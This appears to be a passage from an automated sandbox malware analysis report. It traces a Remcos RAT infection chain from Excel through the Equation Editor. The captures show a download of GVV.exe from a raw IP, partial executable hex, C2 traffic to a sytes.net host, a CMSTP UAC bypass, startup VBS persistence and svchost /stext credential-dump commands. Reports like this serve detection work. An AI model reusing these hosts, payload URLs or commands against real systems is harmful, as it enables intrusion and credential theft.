May 4, 2024 10:05:24.656884909 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.656898975 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.656910896 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.656912088 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.656924009 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.656934023 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.656953096 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.659054041 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659118891 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659162045 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.659181118 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659193993 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659219027 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659226894 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.659233093 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659267902 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.659296036 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659308910 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659322023 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659334898 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659338951 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.659348011 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.659368038 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.669883966 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.669925928 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.669928074 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.669939041 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.669953108 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.669976950 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.669990063 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670001984 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670013905 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670023918 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670027971 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670041084 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670053005 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670053005 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670072079 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670078039 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670089006 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670100927 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670105934 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670114040 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670135021 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670146942 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670161009 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670173883 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670173883 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.670187950 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.670207024 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.725622892 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:25.144294024 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:05:25.449572086 CEST	80	49164	178.237.33.50	192.168.2.22
May 4, 2024 10:05:25.451709032 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:05:25.452004910 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:05:25.761215925 CEST	80	49164	178.237.33.50	192.168.2.22
May 4, 2024 10:05:25.763999939 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:05:26.097522020 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:26.360584974 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:26.760814905 CEST	80	49164	178.237.33.50	192.168.2.22
May 4, 2024 10:05:26.760869026 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:05:31.414494038 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:31.624949932 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:31.625155926 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:31.837186098 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:31.837289095 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:32.048080921 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:32.048110962 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:32.048122883 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:32.048160076 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:32.258518934 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:32.260525942 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:32.260605097 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:32.301783085 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:32.512736082 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:46.661446095 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:46.663584948 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:46.922811031 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:06:16.676399946 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:06:16.678699970 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:06:16.939208984 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:06:31.387350082 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:06:32.166804075 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:06:33.773710012 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:06:36.971618891 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:06:43.274053097 CEST	49164	80	192.168.2.22	178.237.33.50
May 4, 2024 10:06:46.675183058 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:06:46.676975965 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:06:46.938390017 CEST	2766	49162	23.94.53.100	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:05:19.836198092 CEST	54562	53	192.168.2.22	8.8.8.8
May 4, 2024 10:05:19.996830940 CEST	53	54562	8.8.8.8	192.168.2.22
May 4, 2024 10:05:24.899184942 CEST	52917	53	192.168.2.22	8.8.8.8
May 4, 2024 10:05:25.060431957 CEST	53	52917	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 10:05:19.836198092 CEST	192.168.2.22	8.8.8.8	0x7f86	Standard query (0)	yuahdgbceja.sytes.net	A (IP address)	IN (0x0001)	false
May 4, 2024 10:05:24.899184942 CEST	192.168.2.22	8.8.8.8	0xf0b9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 10:05:19.996830940 CEST	8.8.8.8	192.168.2.22	0x7f86	No error (0)	yuahdgbceja.sytes.net		23.94.53.100	A (IP address)	IN (0x0001)	false
May 4, 2024 10:05:25.060431957 CEST	8.8.8.8	192.168.2.22	0xf0b9	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.94.54.101

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	23.94.54.101	80	1012	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
May 4, 2024 10:02:37.910119057 CEST	69	OUT	GET /GVV.exe HTTP/1.1 Connection: Keep-Alive Host: 23.94.54.101
May 4, 2024 10:02:38.122266054 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 02 May 2024 19:51:03 GMT Accept-Ranges: bytes ETag: "9ff8a010ca9cda1:0" Server: Microsoft-IIS/8.5 Date: Sat, 04 May 2024 08:02:37 GMT Content-Length: 1369600 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 62 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 36 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELb3f"6w@@@@@d\|@D{u4@.text `.rdata@@.datalpH@.rsrcD{@\|@@.relocuvp@B [TRUNCATED]
May 4, 2024 10:02:38.122287035 CEST	1289	IN	Data Raw: 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 Data Ascii: h#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
May 4, 2024 10:02:38.122298002 CEST	1289	IN	Data Raw: 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c fd ff Data Ascii: O_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404Y
May 4, 2024 10:02:38.122313976 CEST	1289	IN	Data Raw: 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0
May 4, 2024 10:02:38.334496021 CEST	1289	IN	Data Raw: 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
May 4, 2024 10:02:38.334521055 CEST	1289	IN	Data Raw: ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85 c0 0f Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
May 4, 2024 10:02:38.334533930 CEST	1289	IN	Data Raw: 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a 01 04 Data Ascii: }u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;\|SA23~,FDMEuNGA;\|u[_FMFMLU
May 4, 2024 10:02:38.334547043 CEST	1289	IN	Data Raw: 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d c8 88 Data Ascii: uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
May 4, 2024 10:02:38.334561110 CEST	1289	IN	Data Raw: eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3 Data Ascii: UVEPPh1hIEt3fP7^VVYtf\|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^
May 4, 2024 10:02:38.334574938 CEST	1289	IN	Data Raw: de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c 01 00 Data Ascii: 9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=g
May 4, 2024 10:02:38.334582090 CEST	1289	IN	Data Raw: 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00 57 68 Data Ascii: ____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	178.237.33.50	80	1812	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
May 4, 2024 10:05:25.452004910 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 4, 2024 10:05:25.761215925 CEST	1135	IN	HTTP/1.1 200 OK date: Sat, 04 May 2024 08:05:25 GMT server: Apache content-length: 927 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 36 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 [TRUNCATED] Data Ascii: { "geoplugin_request":"81.181.54.104", "geoplugin_status":206, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"", "geoplugin_region":"", "geoplugin_regionCode":"", "geoplugin_regionName":"", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"RO", "geoplugin_countryName":"Romania", "geoplugin_inEU":1, "geoplugin_euVATrate":19, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"45.9968", "geoplugin_longitude":"24.997", "geoplugin_locationAccuracyRadius":"200", "geoplugin_timezone":"Europe\/Bucharest", "geoplugin_currencyCode":"RON", "geoplugin_currencySymbol":"lei", "geoplugin_currencySymbol_UTF8":"lei", "geoplugin_currencyConverter":4.6208}

Target ID:	0
Start time:	10:01:47
Start date:	04/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f610000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	10:02:36
Start date:	04/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:02:39
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Roaming\CKK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CKK.exe"
Imagebase:	0x9f0000
File size:	1'369'600 bytes
MD5 hash:	FA3641C75D2BEB68C01E8065EEFC4707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:05:17
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CKK.exe"
Imagebase:	0xd40000
File size:	115'664'384 bytes
MD5 hash:	B0D8802F1660EDEC8682E3081795E3F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:05:18
Start date:	04/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CKK.exe"
Imagebase:	0x3f0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:05:24
Start date:	04/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"
Imagebase:	0x3f0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:05:24
Start date:	04/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"
Imagebase:	0x3f0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:05:24
Start date:	04/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"
Imagebase:	0x3f0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:05:29
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
Imagebase:	0xff870000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:05:30
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
Imagebase:	0x1290000
File size:	115'664'384 bytes
MD5 hash:	B0D8802F1660EDEC8682E3081795E3F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:05:31
Start date:	04/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
Imagebase:	0x3f0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: 